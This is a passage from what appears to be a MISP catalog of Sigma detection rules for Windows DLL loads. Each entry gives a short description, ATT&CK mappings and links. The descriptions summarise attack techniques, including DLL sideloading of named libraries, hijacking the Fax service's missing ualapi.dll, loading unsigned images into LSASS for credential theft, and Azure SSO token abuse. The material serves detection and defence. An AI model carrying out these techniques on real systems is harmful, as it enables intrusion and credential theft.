  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9526. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wazuh.yml

Potential Vivaldi_elf.DLL Sideloading

Detects potential DLL sideloading of "vivaldi_elf.dll"

The tag is: misp-galaxy:sigma-rules="Potential Vivaldi_elf.DLL Sideloading"

Potential Vivaldi_elf.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9527. Table References

Links

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vivaldi_elf.yml

Potential Rcdll.DLL Sideloading

Detects potential DLL sideloading of rcdll.dll

The tag is: misp-galaxy:sigma-rules="Potential Rcdll.DLL Sideloading"

Potential Rcdll.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9528. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rcdll.yml

HackTool - SharpEvtMute DLL Load

Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs

The tag is: misp-galaxy:sigma-rules="HackTool - SharpEvtMute DLL Load"

HackTool - SharpEvtMute DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9529. Table References

Links

https://github.com/bats3c/EvtMute

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_sharpevtmute.yml

Fax Service DLL Search Order Hijack

The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.

The tag is: misp-galaxy:sigma-rules="Fax Service DLL Search Order Hijack"

Fax Service DLL Search Order Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9530. Table References

Links

https://windows-internals.com/faxing-your-way-to-system/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ualapi.yml

Potential SolidPDFCreator.DLL Sideloading

Detects potential DLL sideloading of "SolidPDFCreator.dll"

The tag is: misp-galaxy:sigma-rules="Potential SolidPDFCreator.DLL Sideloading"

Potential SolidPDFCreator.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9531. Table References

Links

https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_solidpdfcreator.yml

Unsigned DLL Loaded by RunDLL32/RegSvr32

Detects RunDLL32/RegSvr32 loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.

The tag is: misp-galaxy:sigma-rules="Unsigned DLL Loaded by RunDLL32/RegSvr32"

Unsigned DLL Loaded by RunDLL32/RegSvr32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 9532. Table References

Links

https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql

https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true

https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_unsigned_dll.yml

WMI Persistence - Command Line Event Consumer

Detects WMI command line event consumers

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Command Line Event Consumer"

WMI Persistence - Command Line Event Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9533. Table References

Links

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml

Unsigned Mfdetours.DLL Sideloading

Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

The tag is: misp-galaxy:sigma-rules="Unsigned Mfdetours.DLL Sideloading"

Unsigned Mfdetours.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9534. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml

VMGuestLib DLL Sideload

Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.

The tag is: misp-galaxy:sigma-rules="VMGuestLib DLL Sideload"

VMGuestLib DLL Sideload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9535. Table References

Links

https://decoded.avast.io/martinchlumecky/png-steganography/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml

Potential DLL Sideloading Of Non-Existent DLLs From System Folders

Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of Non-Existent DLLs From System Folders"

Potential DLL Sideloading Of Non-Existent DLLs From System Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9536. Table References

Links

https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/

https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992

https://github.com/Wh04m1001/SysmonEoP

https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/

https://decoded.avast.io/martinchlumecky/png-steganography/

http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml

Potential DLL Sideloading Of DBGCORE.DLL

Detects DLL sideloading of "dbgcore.dll"

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of DBGCORE.DLL"

Potential DLL Sideloading Of DBGCORE.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9537. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml

Amsi.DLL Loaded Via LOLBIN Process

Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack

The tag is: misp-galaxy:sigma-rules="Amsi.DLL Loaded Via LOLBIN Process"

Table 9538. Table References

Links

https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml

Potential AVKkid.DLL Sideloading

Detects potential DLL sideloading of "AVKkid.dll"

The tag is: misp-galaxy:sigma-rules="Potential AVKkid.DLL Sideloading"

Potential AVKkid.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9539. Table References

Links

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_avkkid.yml

Potential DLL Sideloading Via JsSchHlp

Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via JsSchHlp"

Potential DLL Sideloading Via JsSchHlp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9540. Table References

Links

https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/

http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml

System Control Panel Item Loaded From Uncommon Location

Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.

The tag is: misp-galaxy:sigma-rules="System Control Panel Item Loaded From Uncommon Location"

System Control Panel Item Loaded From Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9541. Table References

Links

https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/

https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml

Potential DLL Sideloading Using Coregen.exe

Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Using Coregen.exe"

Potential DLL Sideloading Using Coregen.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9542. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_coregen.yml

Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE

Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library

The tag is: misp-galaxy:sigma-rules="Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE"

Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 9543. Table References

Links

https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml

Remote DLL Load Via Rundll32.EXE

Detects a remote DLL load event via "rundll32.exe".

The tag is: misp-galaxy:sigma-rules="Remote DLL Load Via Rundll32.EXE"

Remote DLL Load Via Rundll32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9544. Table References

Links

https://github.com/gabe-k/themebleed

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_remote_share_load.yml

VMMap Signed Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.

The tag is: misp-galaxy:sigma-rules="VMMap Signed Dbghelp.DLL Potential Sideloading"

VMMap Signed Dbghelp.DLL Potential Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9545. Table References

Links

https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml

Potential System DLL Sideloading From Non System Locations

Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).

The tag is: misp-galaxy:sigma-rules="Potential System DLL Sideloading From Non System Locations"

Potential System DLL Sideloading From Non System Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9546. Table References

Links

https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md

https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://hijacklibs.net/

https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml

Abusable DLL Potential Sideloading From Suspicious Location

Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

The tag is: misp-galaxy:sigma-rules="Abusable DLL Potential Sideloading From Suspicious Location"

Abusable DLL Potential Sideloading From Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9547. Table References

Links

https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml

Suspicious Volume Shadow Copy VSS_PS.dll Load

Detects the image load of vss_ps.dll by uncommon executables

The tag is: misp-galaxy:sigma-rules="Suspicious Volume Shadow Copy VSS_PS.dll Load"

Suspicious Volume Shadow Copy VSS_PS.dll Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9548. Table References

Links

https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add

https://twitter.com/am0nsec/status/1412232114980982787

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml

Potential CCleanerDU.DLL Sideloading

Detects potential DLL sideloading of "CCleanerDU.dll"

The tag is: misp-galaxy:sigma-rules="Potential CCleanerDU.DLL Sideloading"

Potential CCleanerDU.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9549. Table References

Links

https://lab52.io/blog/2344-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_du.yml

Potential Azure Browser SSO Abuse

Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.

The tag is: misp-galaxy:sigma-rules="Potential Azure Browser SSO Abuse"

Potential Azure Browser SSO Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9550. Table References

Links

https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml

Aruba Network Service Potential DLL Sideloading

Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

The tag is: misp-galaxy:sigma-rules="Aruba Network Service Potential DLL Sideloading"

Aruba Network Service Potential DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9551. Table References

Links

https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml

Potential RjvPlatform.DLL Sideloading From Non-Default Location

Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.

The tag is: misp-galaxy:sigma-rules="Potential RjvPlatform.DLL Sideloading From Non-Default Location"

Potential RjvPlatform.DLL Sideloading From Non-Default Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9552. Table References

Links

https://twitter.com/0gtweet/status/1666716511988330499

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml

PowerShell Core DLL Loaded By Non PowerShell Process

Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter’s "load powershell" extension.

The tag is: misp-galaxy:sigma-rules="PowerShell Core DLL Loaded By Non PowerShell Process"

PowerShell Core DLL Loaded By Non PowerShell Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9553. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/p3nt4/PowerShdll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml

Load Of RstrtMgr.DLL By An Uncommon Process

Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

The tag is: misp-galaxy:sigma-rules="Load Of RstrtMgr.DLL By An Uncommon Process"

Load Of RstrtMgr.DLL By An Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9554. Table References

Links

https://www.crowdstrike.com/blog/windows-restart-manager-part-2/

https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data—​iThome.html

https://www.swascan.com/cactus-ransomware-malware-analysis/

https://www.crowdstrike.com/blog/windows-restart-manager-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml

Potential Antivirus Software DLL Sideloading

Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec…​etc

The tag is: misp-galaxy:sigma-rules="Potential Antivirus Software DLL Sideloading"

Potential Antivirus Software DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9555. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml

DotNET Assembly DLL Loaded Via Office Application

Detects any assembly DLL being loaded by an Office Product

The tag is: misp-galaxy:sigma-rules="DotNET Assembly DLL Loaded Via Office Application"

DotNET Assembly DLL Loaded Via Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9556. Table References

Links

https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml

Third Party Software DLL Sideloading

Detects DLL sideloading of DLLs that are part of third party software (zoom, discord…​.etc)

The tag is: misp-galaxy:sigma-rules="Third Party Software DLL Sideloading"

Third Party Software DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9557. Table References

Links

https://hijacklibs.net/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml

Microsoft Excel Add-In Loaded From Uncommon Location

Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location

The tag is: misp-galaxy:sigma-rules="Microsoft Excel Add-In Loaded From Uncommon Location"

Microsoft Excel Add-In Loaded From Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9558. Table References

Links

https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/

https://www.mandiant.com/resources/blog/lnk-between-browsers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_excel_xll_susp_load.yml

Load Of RstrtMgr.DLL By A Suspicious Process

Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

The tag is: misp-galaxy:sigma-rules="Load Of RstrtMgr.DLL By A Suspicious Process"

Load Of RstrtMgr.DLL By A Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9559. Table References

Links

https://www.crowdstrike.com/blog/windows-restart-manager-part-2/

https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data—​iThome.html

https://www.swascan.com/cactus-ransomware-malware-analysis/

https://www.crowdstrike.com/blog/windows-restart-manager-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml

Potential DLL Sideloading Via VMware Xfer

Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via VMware Xfer"

Potential DLL Sideloading Via VMware Xfer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9560. Table References

Links

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmware_xfer.yml

Potential Mfdetours.DLL Sideloading

Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

The tag is: misp-galaxy:sigma-rules="Potential Mfdetours.DLL Sideloading"

Potential Mfdetours.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9561. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours.yml

Python Image Load By Non-Python Process

Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.

The tag is: misp-galaxy:sigma-rules="Python Image Load By Non-Python Process"

Python Image Load By Non-Python Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 9562. Table References

Links

https://www.py2exe.org/

https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml

Potential DCOM InternetExplorer.Application DLL Hijack - Image Load

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class

The tag is: misp-galaxy:sigma-rules="Potential DCOM InternetExplorer.Application DLL Hijack - Image Load"

Potential DCOM InternetExplorer.Application DLL Hijack - Image Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9563. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml

Suspicious Unsigned Thor Scanner Execution

Detects loading and execution of an unsigned thor scanner binary.

The tag is: misp-galaxy:sigma-rules="Suspicious Unsigned Thor Scanner Execution"

Suspicious Unsigned Thor Scanner Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9564. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_thor_unsigned_execution.yml

Unsigned Image Loaded Into LSASS Process

Loading unsigned image (DLL, EXE) into LSASS process

The tag is: misp-galaxy:sigma-rules="Unsigned Image Loaded Into LSASS Process"

Unsigned Image Loaded Into LSASS Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9565. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_lsass_unsigned_image_load.yml

Potential Waveedit.DLL Sideloading

Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.

The tag is: misp-galaxy:sigma-rules="Potential Waveedit.DLL Sideloading"

Potential Waveedit.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9566. Table References

Links

https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_waveedit.yml

DotNet CLR DLL Loaded By Scripting Applications

Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.

The tag is: misp-galaxy:sigma-rules="DotNet CLR DLL Loaded By Scripting Applications"

DotNet CLR DLL Loaded By Scripting Applications has relationships with:

